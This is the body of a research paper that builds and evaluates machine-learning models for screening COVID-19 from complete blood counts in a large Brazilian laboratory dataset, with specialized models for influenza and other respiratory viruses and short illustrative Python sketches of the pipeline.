In analyzing complete blood counts of individuals with COVID-19 infection in isolation, we find some changes to be quite characteristic of the disease11,12,13. This implies that machines, which can detect patterns not easily noticeable by humans, could be employed for automatic detection and preliminary screening of the disease. Indeed, many models have been proposed for automated COVID-19 diagnosis through CBCs and omics data. We argue that the detection performance of these models is possibly biased—or overestimated—as many patterns are not unique to SARS-Cov-2. The performance of these models will likely drop significantly as the prevalence of other respiratory viruses increases. This work employs a dataset collected between 2016 and 2021 containing exams of individuals who underwent blood tests in conjunction with RT-PCR exams throughout Brazil, both for COVID-19 and for other pathologies like Influenza-A or H1N1. More specifically, our dataset includes individuals who underwent a CBC at an interval of 60 days before or after a RT-PCR test.
For 2020 and 2021, we collected laboratory data for 900,220 unique individuals, 809,254 CBCs, and 1,088,385 RT-PCR tests, of which 21% (234,466) were positive and less than 0.2% (1679) were inconclusive. This work does not investigate demographic, prognostic, or clinical data, such as ethnicity, hospitalization, or symptomatology, as these fall outside the laboratory's scope. We propose modeling the task as a binary classification problem and analyzing two distinct timeframes: one considering the early pandemic stage, namely the first wave of COVID-19 cases in Brazil; and a second stage after November 2020, when the second wave of COVID-19 started and we saw the emergence of a new variant of concern, P.1, which eventually led to the collapse of the health system in the capital of the state of Amazonas in late December14,15.
One of the key highlights of our proposed approach is the analysis of other RNA respiratory viruses. We also collected 120,807 CBCs, from 2016 to 2019, of 16,940 individuals who tested positive for Influenza-A, Influenza-B or H1N1, as well as other respiratory viruses, plus an additional 307,978 unlabeled CBCs. In particular, these additional CBCs included exams from the 2016 H1N1 surge in São Paulo16, during which the population adopted hygiene habits similar to the ones recommended in 2020, like social distancing and the use of masks, although on a smaller scale. To the best of the authors' knowledge, this is the most extensive and comprehensive COVID-19-related dataset to date.
We follow the guidelines provided by the IJMEDI checklist17 for applying machine learning to medical data, allowing for higher-quality work and easier reproducibility and understanding of results. Our analysis focused on patients older than 18 years. We believe more experiments are necessary to assert performance for children and teenagers under 18 years old, although data regarding these age groups was also present in all training and test sets.
Throughout our experiments, we train an ensemble of machine learning models on this million-scale dataset to predict SARS-Cov-2 positivity. To guarantee the correct labeling of training instances, we focus on the CBC results as close to the first positive result as possible. Our analysis shows that the additional data from other RNA respiratory viruses is fundamental for properly screening COVID-19. In the absence of such information, models are prone to confuse SARS-Cov-2 with other respiratory viruses or infections. This finding corroborates many studies that raised concerns regarding bias in COVID-19 research18,19,20. We also demonstrate the necessity of keeping a model as up-to-date as possible so that it can keep up with the different stages of a pandemic surge. Our model retains high performance across multiple evaluation scenarios and on simulations with varying prevalences of COVID-19, properly differentiating SARS-Cov-2 from other confounding viruses, thus demonstrating the robustness of our approach.
## Methods
### Data
The Fleury database structure was created in October 1997 using InterSystems Caché and Ensemble, version 1.4 (Caché, InterSystems, Cambridge, MA, 2018; https://docs.intersystems.com/; November 2020), a high-performance architecture commonly used to develop software applications for healthcare management. The database was built using standard healthcare industry practices to ensure accuracy, completeness, and security of the data collected. The results of the laboratory tests are automatically inserted into a Microsoft SQL database after verification of the RT-PCR output. Within a few seconds, data are replicated to the Caché database (InterSystems) for permanent storage. Once stored in the database, the result is made available to patients. All users have a username and password, maintained by Windows Active Directory (AD). All registry changes to the database are tracked through a log and are restricted to users with high-level administrative permissions. Information is kept secure through a separate network firewall, accessed only by authorized persons within the Fleury Group's domains. Data stored in this database has been used in several clinical studies before the COVID-19 outbreak21,22,23,24,25,26.
This project was submitted to, evaluated, and approved by the Research Ethics Committee (CEP) of Grupo Fleury (CAAE: 33790820.3.0000.5474), duly qualified by the National Research Ethics Committee (CONEP) of the National Health Council of Brazil. The Research Ethics Committee (CEP) is an interdisciplinary and independent collegiate of public relevance, of consultative, deliberative, and educational character, created to defend the interests of research participants in their integrity and dignity and to contribute to the development of research within the highest ethical standards. By decision of the CEP, since this project uses retrospective and anonymized data, there was no need to apply a Free and Informed Consent Term (TCLE) to participating patients.
The CBC measurements were obtained from EDTA-K3 peripheral blood samples analyzed by Automated Hematology Analyzers of the XT or XN series from Sysmex (Sysmex Corporation, Kobe, Japan). In total, 72 pieces of equipment are distributed over 36 laboratories across the country. Red blood cells (RBC) and platelets were counted and sized by direct current (DC) impedance with hydrodynamic focusing (sheath flow DC detection). The hematocrit was determined from the RBC pulse height. Hemoglobin was measured using sodium lauryl sulfate spectrophotometry. CBCs also include the physical features of the RBC: mean corpuscular volume (MCV), a measurement of the average size of red blood cells; mean corpuscular hemoglobin (MCH), a calculated measurement of the average amount of hemoglobin; mean corpuscular hemoglobin concentration (MCHC), a calculated measurement of the average concentration of hemoglobin; and red cell distribution width (RDW), a measurement of the variation in RBC size. The white blood cells (WBC) and the six-part differential were determined by fluorescence flow cytometry. Specifically, the WBC subpopulations were separated based on cell complexity (side-scattered light), cell size (forward-scattered light), and fluorescence signal (side fluorescent light).
Quality control is performed daily using three control levels (high, normal, and low) for each parameter. Measurements are analyzed using the InsightTM Interlaboratory Quality Assessment Program for Sysmex hematology analyzers, where data from users worldwide are compared. To guarantee equivalence and reproducibility of our analysis and enable the use of common reference intervals for different measurement procedures27, harmonization of equipment is performed in accordance with the Clinical and Laboratory Standards Institute’s (CLSI) guidelines28. Results are accepted if the percentage difference is less than 50% of the total error for each parameter, which allows us to devise reference values for each measurement29,30.
### Complete blood count and model features
A complete blood count (or simply, CBC) is a common blood test used for a variety of reasons, including the detection of disorders and infections. A CBC test measures several components and features in the blood, including RBC, which carry oxygen; Hemoglobin, the oxygen-carrying protein in red blood cells; Hematocrit, the proportion of red blood cells to the fluid component; WBC, which fight infection (i.e., Monocytes, Lymphocytes, Eosinophils, Basophils, Neutrophils); and Platelets, which help with blood clotting.
Abnormal increases or decreases in cell counts may indicate an underlying biological process taking place, like inflammation or immune response. Also, values such as the Neutrophil-Lymphocyte ratio, Platelet-Monocyte ratio, or the Platelet-Lymphocyte ratio are recognized as inflammatory markers31. Table 1 shows analyte means and standard deviations, as well as the employed units of measure in each of our cohorts. We can easily identify some patterns that might help us in sorting COVID-19 infected patients from the remaining ones. We can also clearly perceive that the distributions for each gender are slightly different. This is to be expected, as it is known that CBC values vary with age and gender32. However, introducing an explicit gender variable into our model could entail bias. To avoid this, we instead normalize each analyte by the corresponding gender and age reference values devised by Grupo Fleury, thus building a unified model that considers CBC analyte values regardless of gender.
Specifically, we perform normalization by employing the reference ranges as a pivot. Let R be the reference values of an analyte; the general formula for scaling features is given as

$$x' = \frac{x - \Omega(R(x \mid \mathrm{sex}=s, \mathrm{age}=a))}{O(R(x \mid \mathrm{sex}=s, \mathrm{age}=a)) - \Omega(R(x \mid \mathrm{sex}=s, \mathrm{age}=a))}$$

(1)

where x is an original value, $x'$ is the normalized value, $R(x \mid \mathrm{sex}=s, \mathrm{age}=a)$ describes the reference values for x given the sex s and age a of a patient, and Ω and O represent the lower and upper bounds, respectively. For example, suppose a male adult presents an RBC count of 5.0 millions/mm3 and the reference values lie in the range [4.30, 5.70]; we first subtract 4.30 from 5.0 and divide the result by 1.4 (the difference between the maximum and minimum reference values), obtaining a normalized RBC count of 0.5. Consequently, normalized values above 1 represent abnormally high cell counts. Likewise, normalized values below 0 represent abnormally low counts. Our model analyzes normalized cell counts and their corresponding pairwise ratios as potential features for building our models.
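As a concrete illustration of Eq. (1), the following sketch normalizes a raw analyte value by a sex- and age-specific reference range. The lookup table and its keys are hypothetical placeholders; the actual Grupo Fleury reference tables are not reproduced here.

```python
# Hypothetical reference ranges per (analyte, sex, age band); illustrative values only.
REFERENCE_RANGES = {
    ("rbc", "M", "adult"): (4.30, 5.70),   # millions/mm3
    ("rbc", "F", "adult"): (3.90, 5.00),
    # ... one entry per analyte / sex / age band
}

def normalize_analyte(value, analyte, sex, age_band):
    """Scale a raw analyte value by its sex- and age-specific reference range.

    Values in [0, 1] fall inside the reference interval; values below 0 are
    abnormally low and values above 1 abnormally high, matching Eq. (1).
    """
    low, high = REFERENCE_RANGES[(analyte, sex, age_band)]
    return (value - low) / (high - low)

# Worked example from the text: a male adult with an RBC count of 5.0 millions/mm3
print(normalize_analyte(5.0, "rbc", "M", "adult"))  # -> 0.5
```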
The performance of machine learning methods is heavily dependent on the choice of features on which they are applied33. For this reason, much of the current effort in deploying such algorithms goes into the design of preprocessing pipelines and data transformations that result in a representation of the data that can support effective machine learning33,34,35. The process of using available features to create additional ones that improve model performance is often called 'feature engineering', a predominantly human-intensive and time-consuming step that is central to the data science workflow. It is a complex exercise, performed iteratively through trial and error, and mostly driven by domain knowledge36. Recently, many studies have shown the benefits of automating this process by creating candidate features in a domain-independent and data-driven manner, followed by an effective method of feature selection. This way, it is possible not only to improve model correctness but also to discover powerful new features and processes that could be additional candidates for domain-specific studies36,37,38. We avoid potential spurious correlations by confirming that all selected features have a strictly non-zero impact on model output after n-fold cross-validation.
### Inclusion–exclusion criteria
The scale of our dataset allows us to produce high-quality training sets and massive validation sets. Table 2 provides the gender and RT-PCR result distributions employed for training and evaluating our models. In addition to SARS-Cov-2, Influenza-A, Influenza-B, and Influenza-H1N1, our dataset also comprises a variety of other respiratory pathogens, including Coronavirus OC43, Human Metapneumovirus A, Adenovirus, Parainfluenza 1, Coronavirus HKU1, Enterovirus B, Parainfluenza 2, Coronavirus NL63, Respiratory Syncytial Virus A, Mycoplasma pneumoniae, Respiratory Syncytial Virus B, Rhinovirus, Human Metapneumovirus B, Coronavirus 229E, Chlamydophila pneumoniae, Bordetella pertussis, Parainfluenza 3, Bocavirus, and Parainfluenza 4. We argue that taking this variety of confounding pathogens into consideration is of utmost importance to learn models that are specific to COVID-19.
#### Safe labeling
It is worth mentioning that CBCs and RT-PCRs are part of different exam batteries and are therefore often collected on different dates for the same individual. Thus, an important decision is the ideal time frame between the collection of a CBC and that of the RT-PCR test used to validate its label. It is challenging to determine the precise moment an infection started given the lack of information concerning the onset of symptoms. We also observed abnormalities in the CBCs associated with recovered individuals. These differences could be related to drug usage and/or other therapies, or be due to symptoms that persist even after the virus has been eliminated. In this context, we hypothesize that CBCs, even when associated with a positive RT-PCR, may be affected by treatment-related effects. Figure 1 shows the concentration distribution of some analytes along the disease progression time frame. The lower the ratio between white blood cells (WBC) and red blood cells (RBC), the higher the probability of the individual being positive for COVID-19. Additionally, we observed that the lowest value for this ratio lies on day 0. Since our working dataset consists of patients who went to one of Grupo Fleury's laboratories to undertake an exam, we hypothesize that the search for an RT-PCR, in particular for patients who obtained a confirmatory diagnosis of COVID-19, might be associated with the onset of symptoms, explaining this particular pattern. We did not observe similar behavior for the other evaluated viruses, perhaps due to the relative difference in public awareness and concern regarding SARS-Cov-2 and Influenza infections.
Furthermore, we also observed that most analytes tend to present abnormal values for up to 30 days. This might be related to the natural evolution of COVID-19 into its inflammatory stage, the effects of treatments, or even long-lasting effects on patients' immune systems. We concluded that the safest and most effective gap to use for labeling CBCs with RT-PCR outcomes is the 24-hour window centered on the first positive RT-PCR result of an individual, with the remaining frames being too uncertain for a positive diagnosis, and thus discarded.
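A minimal sketch of this labeling rule follows, assuming hypothetical `patient_id`, `result`, and `collected_at` columns for the CBC and RT-PCR tables; it illustrates the 24-hour window described above rather than the authors' production code.

```python
import pandas as pd

def label_cbcs(cbc: pd.DataFrame, pcr: pd.DataFrame) -> pd.DataFrame:
    """Keep CBCs of never-positive individuals (label 0) and CBCs collected
    within the 24-hour window centered on an individual's first positive
    RT-PCR (label 1); other CBCs of ever-positive individuals are dropped."""
    first_pos = (pcr.loc[pcr["result"] == "positive"]
                 .groupby("patient_id")["collected_at"].min()
                 .rename("first_positive_at")
                 .reset_index())
    df = cbc.merge(first_pos, on="patient_id", how="left")
    hours = (df["collected_at"] - df["first_positive_at"]).dt.total_seconds() / 3600.0
    in_window = hours.abs() <= 12          # +/- 12 h around the first positive result
    df["label"] = in_window.astype(int)
    # never-positive individuals (NaT) keep all CBCs; ever-positive keep only the window
    return df[df["first_positive_at"].isna() | in_window]
```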
#### Removing gender and age biases
Supplementary Figure 1 presents the age distribution of each pathology subset. We verify a slight predominance of males among positive COVID-19 cases and of females among positive Influenza cases. To address this, we sub-sampled the training sets to remove possible biases that could jeopardize learning, and validated on unsampled data to properly verify model behavior in real-world scenarios.
#### Removing possible false-negative cases
Another point of attention is the possible existence of false-negative results for RT-PCR exams. In particular, we often see cases of the same individual having negative results interspersed with two or more positive results. Therefore, it is also necessary to carry out a preprocessing step to guarantee the authenticity of negative labels and to ensure that the model is as faithful as possible to the real scenario of COVID-19, and not to the limitations of the RT-PCR exam. We filter out any negative RT-PCR results issued after the first positive RT-PCR result, thus focusing our analysis on pre-COVID individuals and those in the preliminary stages of the infection. We also include in our negative cohort individuals who never had any contact with SARS-Cov-2, namely individuals with exams dating before 2020.
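The corresponding filter can be sketched as follows, again with hypothetical column names.

```python
import pandas as pd

def drop_post_positive_negatives(pcr: pd.DataFrame) -> pd.DataFrame:
    """Discard negative RT-PCR results issued after an individual's first
    positive result; they are likely false negatives or post-infection tests."""
    first_pos = (pcr.loc[pcr["result"] == "positive"]
                 .groupby("patient_id")["collected_at"].min())
    after_first_pos = pcr["collected_at"] > pcr["patient_id"].map(first_pos)
    late_negatives = (pcr["result"] == "negative") & after_first_pos
    return pcr.loc[~late_negatives]
```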
### Outbreak waves
Table 2 also shows training and validation sets for the two waves that occurred during the COVID-19 outbreak in Brazil. The training set for the first wave comprises labeled CBCs acquired until 26 June 2020, whilst its validation set comprises labeled CBCs acquired between 27 June 2020 and 05 September 2020. The training set for the second wave comprises labeled CBCs acquired until 30 September 2020, whilst its validation set comprises labeled CBCs acquired between 01 October 2020 and 28 February 2021. Both training and validation sets contain data corresponding to viruses other than SARS-Cov-2: the training sets contain instances from 2016 to 2018, while the validation sets contain instances from 2019.
### Statistics and reproducibility
Our main objective is to demonstrate that training a model directly on COVID-19 data alone is not enough to guarantee robustness when multiple respiratory infections are present, as might be expected in a possible COVID-19 endemic scenario. This is true even for a massive dataset such as the one we employed in our study. Thus, we built models resilient to a pre-selected set of core confounding viruses and showed that we retain similar COVID-19 detection performance in scenarios with a high prevalence of COVID-19, while also achieving high discriminatory figures in low-prevalence scenarios with an abundance of other respiratory infections. Furthermore, we also demonstrate that the model indeed learns useful relationships between CBC patterns and other respiratory infections. To ensure the relevance of the results, we assess the statistical significance of our measurements through a pairwise t-test39 with p-value ≤ 0.05 and through 5-fold cross-validation.
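For illustration, a comparison of per-fold AUROCs along these lines could look like the sketch below, assuming the pairwise test is a paired t-test over 5-fold cross-validation scores; the fold scores shown are made up, not results from the paper.

```python
import numpy as np
from scipy import stats

# Hypothetical per-fold AUROCs for two competing models (5-fold cross-validation)
auroc_model_a = np.array([0.91, 0.92, 0.90, 0.93, 0.92])
auroc_model_b = np.array([0.88, 0.89, 0.87, 0.90, 0.89])

# Paired t-test across folds; the difference is called significant at p <= 0.05
t_stat, p_value = stats.ttest_rel(auroc_model_a, auroc_model_b)
print(f"t={t_stat:.2f}, p={p_value:.4f}, significant={p_value <= 0.05}")
```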
#### Model training
Our models were trained with the objective of distinguishing CBC (+) from CBC (−) instances (refer to Table 2). We followed a stacking procedure: the training stage consists of creating multiple specialized models, one for each of the viruses considered (i.e., COVID-19, Influenza-A, Influenza-B, Influenza-H1N1, and other viruses), and then combining their outputs to obtain a final prediction for the target disease. We divided the training samples into two equally sized batches. The first was used to train the specialized models and the second to train the final stacked model. Each specialized model only had access to label information regarding the corresponding virus, while the stacking model employs the CBC (+) and CBC (−) labels.
Both the specialized models and the final stacking model were trained with LightGBM40, a fast implementation of tree-based gradient boosting. We employed the SHAP algorithm41,42,43 to obtain an interpretation of the model's predictions, giving us not only the probability that a specific CBC is associated with a positive RT-PCR for COVID-19 but also an explanation consisting of the feature importances leading to the model's decision. We assessed performance by calculating AUROC, sensitivity, and specificity on the validation sets, as well as by running 5-fold cross-validation on the training sets. Supplementary Figure 2 illustrates the proposed approach's pipeline. We performed an extensive grid search for hyperparameter tuning for all the aforementioned models. Our final models employ 100 gradient-boosted decision tree estimators with a maximum tree depth of 50 and a maximum number of leaves of 50. The learning rate was set to 2e−1, optimizing the binary cross-entropy function.
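A minimal sketch of one such model using the reported hyperparameters is shown below; the data-handling details (column layout, validation split) are placeholders rather than the authors' exact pipeline.

```python
import lightgbm as lgb
from sklearn.model_selection import train_test_split
from sklearn.metrics import roc_auc_score

def train_specialized_model(X, y):
    """Train one specialized classifier on normalized CBC features X with
    binary labels y (1 = positive RT-PCR for the target virus)."""
    X_tr, X_val, y_tr, y_val = train_test_split(X, y, stratify=y, test_size=0.2)
    model = lgb.LGBMClassifier(
        n_estimators=100,    # 100 gradient-boosted decision trees
        max_depth=50,        # maximum tree depth reported in the text
        num_leaves=50,       # maximum number of leaves reported in the text
        learning_rate=0.2,   # 2e-1
        objective="binary",  # binary cross-entropy
    )
    model.fit(X_tr, y_tr, eval_set=[(X_val, y_val)])
    auroc = roc_auc_score(y_val, model.predict_proba(X_val)[:, 1])
    print(f"validation AUROC: {auroc:.3f}")
    return model
```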
#### Selecting specialized models
Not all CBC analytes are relevant features for differentiating the base targets (i.e., each virus), and some features may even be detrimental to the task. To find a set of relevant features, we represent the model space as a directed acyclic graph (DAG) in which each node represents a distinct feature subset, and an edge A → B is present if B can be reached from A by adding a single feature, thus representing a transitive reduction of the more complex combinatorial complete model space. This modeling approach presents two desirable properties: first, any vertex is reachable from the empty model $\emptyset$; second, for any feature-set path there exists a topological ordering, an ordering of all vertices into a sequence such that, for every edge, the start vertex occurs earlier in the sequence than the end vertex. These properties imply a partial ordering of the graph starting from the root node, which allows us to search it in an orderly manner. We apply the A* algorithm44, employing as heuristic the AUROC of the model represented by the feature set of a given vertex. We hypothesize that there exists a set of optimal feature expansions that lead to the best-performing models for each specific base task. This allows us to search the combinatorial space of feature subsets (N! feature-addition orderings) to select the best-performing specialized models.
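The search can be sketched as a best-first expansion of the feature-subset DAG with validation AUROC as the heuristic; this is a simplified stand-in for the A* procedure described above, with the cost function, scoring routine, and stopping rule left as assumptions.

```python
import heapq
from itertools import count

def best_first_feature_search(candidate_features, fit_and_score, max_expansions=200):
    """Best-first search over the feature-subset DAG described in the text.

    Each node is a frozenset of features; an edge adds exactly one feature.
    fit_and_score(features) is assumed to train a model on that subset and
    return its validation AUROC, which is used as the search heuristic.
    """
    tie = count()                              # tie-breaker so the heap never compares sets
    start = frozenset()
    frontier = [(-0.5, next(tie), start)]      # empty model: AUROC 0.5 by convention
    seen, best = {start}, (0.5, start)
    for _ in range(max_expansions):
        if not frontier:
            break
        neg_score, _, node = heapq.heappop(frontier)
        if -neg_score > best[0]:
            best = (-neg_score, node)
        for feat in candidate_features:        # expand by single-feature additions
            child = node | {feat}
            if child not in seen:
                seen.add(child)
                heapq.heappush(frontier, (-fit_and_score(child), next(tie), child))
    return best                                # (best AUROC, selected feature subset)
```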
#### Learning the final model
Our stacking formulation extends previous COVID-19 learning approaches by building specialized models targeted at confounding viruses. When building the final model, we can therefore expect it to learn prediction relationships between COVID-19 and other respiratory infections. For example, in a scenario with a moderately high chance of Influenza, we would need an exceedingly high COVID-19 probability to confirm a positive infection hypothesis.
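A condensed sketch of the stacking step is given below, assuming the specialized models were already trained on the first half of the training data and exposing their positive-class probabilities as meta-features; the stacker's hyperparameters are plausible placeholders, not the authors' exact configuration.

```python
import numpy as np
import lightgbm as lgb

def build_stacked_model(specialized_models, X_stack, y_covid):
    """Train the final COVID-19 model on the outputs of the per-virus models.

    specialized_models: dict such as {"covid": m0, "influenza_a": m1, ...},
    each trained on the first half of the training data; X_stack / y_covid
    come from the second half, as described in the text.
    """
    # One probability column per specialized model becomes a stacking feature
    meta_features = np.column_stack([
        m.predict_proba(X_stack)[:, 1] for m in specialized_models.values()
    ])
    stacker = lgb.LGBMClassifier(n_estimators=100, num_leaves=50, learning_rate=0.2)
    stacker.fit(meta_features, y_covid)
    return stacker
```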
### Reporting summary
Further information on research design is available in the Nature Research Reporting Summary linked to this article.
## Results
### Features and model effectiveness for COVID-19 identification
Our first set of experiments is dedicated to validating that CBCs are useful sources of information for identifying SARS-Cov-2 infection. It is worth mentioning that in this initial experiment we did not employ information about infections other than COVID-19 while training the model; that is, CBC (−) is composed only of the COVID-19 (−) sub-population. We trained a COVID-19 model with the labeled CBCs from the first two quarters of 2020 and evaluated it on the labeled CBCs from the third quarter of 2020. Supplementary Fig. 3 shows the AUROC improvement as we include more features in the COVID-19 model. We can verify that employing only three features is already enough to surpass the 0.85 AUROC mark. Our final COVID-19 model achieves an AUROC of 0.922, a specificity of 0.918, and a sensitivity of 0.824, clearly indicating the potential of employing large volumes of CBCs to identify SARS-Cov-2 infection. Figure 2 presents the 15 most important features identified by our algorithm, as well as their contribution to the final specialized COVID-19 model prediction.
### SARS-Cov-2 mutations and variants
By mid-November 2020, Brazil entered the second wave of COVID-19, which eventually led to the collapse of the health system in Manaus, capital of Amazonas, a state in Brazil45. One of the explanations raised by the local government was the emergence of a new COVID-19 variant, known as 20J/501Y.V3—or simply P.114. To evaluate the performance of our COVID-19 model as the SARS-Cov-2 virus mutates, we trained it at two distinct points in time. The first one, which we will refer to as the “First-wave model”, was trained using the training set associated with the first wave (as shown in Table 2). The second, which we will refer to as the “Second-wave model” was trained using the training set associated with the second wave in Brazil (as shown in Table 2).
Figure 3 presents the AUROC obtained by each of these two models during the pandemic, up to March 2021, considering a 7-day sliding window, as well as the respective COVID-19 prevalence (i.e., the proportion of positive cases over all RT-PCR exams in a given period). We investigate three periods of interest: R(t) > 1.00, a period in which the SARS-Cov-2 reproduction number stayed above 1.00 uninterruptedly for several days, during which the virus spread quickly through the entire country; Christmas and New Year's Day, a period in which families reunite, spreading the virus and resulting in a clear increase in COVID-19 cases observed across the entire country; and Carnival, a period in which large crowds fraternize. Carnival events were canceled for 2021, but many gatherings were reported in some regions of the country, such as Rio de Janeiro, Natal, and Recife.
The performance of the First-wave model seems to deteriorate with time, mostly as a result of periods of high COVID-19 prevalence due to SARS-Cov-2 variants. The Second-wave model, on the other hand, reaches AUROC values as high as 0.952. Interestingly, the periods we analyzed affected the two models in different ways, but the experiment highlights the importance of retraining the models so that they can account for emerging virus variants.
### Identifying SARS-Cov-2 in the presence of other RNA respiratory viruses
Our previous set of experiments verified the performance of our models in predicting the COVID-19 RT-PCR result from complete blood counts. However, a key concern remained regarding the ability to distinguish between different respiratory viruses. Thus, after a careful study, we further trained specialized models to predict the RT-PCR result for various types of Influenza and other respiratory viruses. Our approach employs stacking to combine the outputs of each specialized model (i.e., COVID-19, Influenza-A, Influenza-B, H1N1, etc.) into a final prediction for COVID-19. Specifically, we used half of the training data to learn the specialized models and the other half to train the final stacked model. As illustrated in Fig. 4, our stacked COVID-19 model achieves an AUROC as high as 0.913 (cross-validation on the stacking training sets shown in Table 2) and 0.917 (using the stacked training and validation sets shown in Table 2), while retaining 0.80 sensitivity and 0.91 specificity.
While the stacked model achieves high performance predicting COVID-19, it is also important to verify its specificity by analyzing the predictions made for individuals infected with viruses other than SARS-Cov-2. Figure 5 shows how the different models perform specifically on individuals who were infected by some virus in 2019. The ideal result would be all predictions being negative for COVID-19. As discussed before, models trained solely on SARS-Cov-2 data are very effective in identifying COVID-19 cases, but the results on 2019 data indicate that these models perform poorly on other viruses (Fig. 5a). Including viruses other than SARS-Cov-2 during training increases the performance on 2019 data (Fig. 5b). The stacked model proves to be much more specific for COVID-19 than both previous models (Fig. 5c).
Figure 6 further investigates the specificity of the stacked model by showing the prediction distribution on the 2019 data (i.e., individuals infected by a virus other than SARS-Cov-2). The stacked model assigns a 0−10% COVID-19 probability to roughly 44% of the predictions on 2019 data. Furthermore, the stacked model correctly places almost 80% of the evaluated individuals below the 30% COVID-19 prediction mark, with over 40% placed below the 7% probability mark.
### Simulating endemic-pandemic scenarios
We also considered how the model would perform in an endemic scenario in which individuals infected with SARS-Cov-2 could be scarce and other types of confounding viruses might be present. To simulate different scenarios, we evaluate the stacked model on data with different COVID-19 prevalences. Specifically, we sample exams from the second-wave validation set and from the 2019 data to control the COVID-19 prevalence. The main goal is to stress the stacked model by presenting cases from before any safety and/or social distancing policies took place, in an attempt to mimic what could happen in an endemic future. These results are summarized by the AUROC, sensitivity, and specificity numbers for each evaluated COVID-19 prevalence, presented in Table 3. To guarantee statistical significance, we perform 30 repetitions of each simulation and present the respective 95% confidence intervals. The stacked model proved to be robust across varying levels of COVID-19 prevalence.
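One way to implement such a prevalence-controlled simulation is sketched below; the sample size and the confidence-interval computation are illustrative assumptions rather than the authors' exact protocol.

```python
import numpy as np
from sklearn.metrics import roc_auc_score

def simulate_prevalence(model, X_pos, X_neg, prevalence, n_total=10_000, n_runs=30, seed=None):
    """Evaluate the stacked model at a fixed COVID-19 prevalence by resampling
    positives (e.g., second-wave validation data) and negatives (e.g., 2019 data)."""
    rng = np.random.default_rng(seed)
    n_pos = int(round(prevalence * n_total))
    aurocs = []
    for _ in range(n_runs):
        pos = X_pos[rng.choice(len(X_pos), n_pos, replace=True)]
        neg = X_neg[rng.choice(len(X_neg), n_total - n_pos, replace=True)]
        X = np.vstack([pos, neg])
        y = np.r_[np.ones(n_pos), np.zeros(n_total - n_pos)]
        aurocs.append(roc_auc_score(y, model.predict_proba(X)[:, 1]))
    lo, hi = np.percentile(aurocs, [2.5, 97.5])   # rough 95% interval over the runs
    return float(np.mean(aurocs)), (float(lo), float(hi))
```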
## Discussion
The CBC is a simple and inexpensive exam. It is part of most laboratory routines, so "astute practitioners may use nuances and clues from the CBC in many clinical situations"10. Liu et al.46 devised a high-accuracy risk assessment tool that predicts mortality for COVID-19 through CBCs. Li et al.47 verified that a low white blood cell count is related to COVID-19 severity by analyzing 12 COVID-19 death cases and 18 individuals with moderate to severe symptoms, observing a low lymphocyte percentage in most of the cases. Although our dataset had no indicator of severity, we did find a drop in lymphocyte count the closer individuals were to their first positive RT-PCR result, corroborating this finding. Furthermore, we also verified many other analytes that shared a similar pattern. Although more research is needed, we believe that the key analytes indicated by our model might provide possibilities for future research. The literature suggests that there might be intrinsic relationships between analytes that are characteristic of COVID-19. For instance, Nalbant et al.48 found that the neutrophil/lymphocyte ratio (NLR) might be particularly typical of COVID-19 infection. However, there is a profusion of other possible promising ratios and patterns currently under-explored for the sake of COVID-19 diagnosis. One of the secondary goals of this work is to investigate this hypothesis, and we confirmed that our search algorithm tends to favor ratios over raw analyte counts.
We identified several works attempting to exploit blood counts to detect COVID-19 with the help of machine learning algorithms. Avila et al.49 trained a naive Bayes classifier with data from 510 individuals admitted to hospitals presenting COVID-19-like symptoms, with a reported AUROC of 0.84. Silveira et al.50 devised a solution based on gradient boosting machines that focuses primarily on white-series analytes. They achieved an AUROC of 0.81 on a dataset composed of anonymized data from 1157 individuals. Banerjee51 trained both a shallow neural network and a random forest model to distinguish COVID-19 cases on data from 954 individuals, reaching an AUROC of 0.94 for those who were admitted to the hospital with severe symptoms, and an AUROC of 0.80 for individuals with mild symptoms. Cabitza et al.52 evaluated different machine learning algorithms on both a COVID-19-specific dataset and another dataset including individuals who exhibited pneumonia symptoms in 2018, consisting of data from 1624 cases. By exploring a variety of biomarkers, including the analytes from CBCs, they were able to achieve an AUROC of 0.90. However, a point of concern for such studies is data scale. We know from the literature that complex machine learning models are prone to overfitting and, with small sample sizes containing only a few hundred individuals, all these works are at risk of presenting unreliable results and overestimated performance.
Wynants et al.18 provided a study of 37,421 research titles, with 169 studies describing 232 prediction models, of which 208 were unique, newly developed models. These models covered both diagnostic solutions to identify suspected infection cases and prognostic evaluation. One of the key findings was that all models were at high (97%, n = 226) or unclear (3%, n = 6) risk of bias according to an assessment with PROBAST, suggesting a risk of unreliable predictions when employed in the real world. A similar finding was reported by Bastos et al.19, who verified that, out of the 49 risk assessments performed over 5016 references and 40 studies, 98% reported a high risk of individual selection bias. Only four studies included outpatients and only two performed some sort of validation at the point of care. This kind of problem is not specific to COVID-19-related research and has been present in many previous medical studies. As mentioned in ref. 53:
"... failure to proactively and comprehensively mitigate all biases—including latent ones that only emerge over time—risks exacerbating health disparities, eroding public trust in healthcare and health systems, and somewhat ironically, hindering the adoption of AI-based systems that could otherwise help individuals live better lives."
With that in mind, it is important to highlight the work of Soltan et al.54 which, with the help of the Oxford University Hospital, included 114,957 individuals in a COVID-negative cohort and 437 in a COVID-positive cohort, thus establishing a dataset of 115,394 individuals for a full study. Before our work, this was the most extensive COVID-19 study to date. While exploring a variety of scenarios regarding COVID-19 prevalence, they reported AUROC values ranging from 0.88 up to 0.94 when their model employs additional data from CBCs, blood gas, and other vital signs collected in routine clinical exams. However, one key concern in this study is the low prevalence of Influenza-like infections (<0.1%), which drew our attention to a different kind of selection bias in COVID-19 research. Due to the hygiene habits acquired by the population worldwide after the pandemic outbreak, we believe that many confounding diseases might be underrepresented in most existing datasets. As such, models might be learning patterns that are associated with a general infectious condition rather than specifically with COVID-19.
Our concern regarding data bias in the latest COVID-19 research appears to be valid, as verified during our experiments assessing performance on data from before 2020. Several instances of individuals with different variants of the Influenza virus were initially labeled as potentially COVID-19-infected, which we knew not to be true. We therefore devised an approach to insert information regarding other diseases into our model without harming accuracy. In particular, we explored two approaches: the first was simply retraining our specialized model with added data that was negative for COVID-19 but positive for other diseases; the second was creating an ensemble of models whose constituents are specialized in other virus infections. We observed similar AUROC results for both, with the first having a slightly higher AUROC at the cost of lower differentiation capabilities.
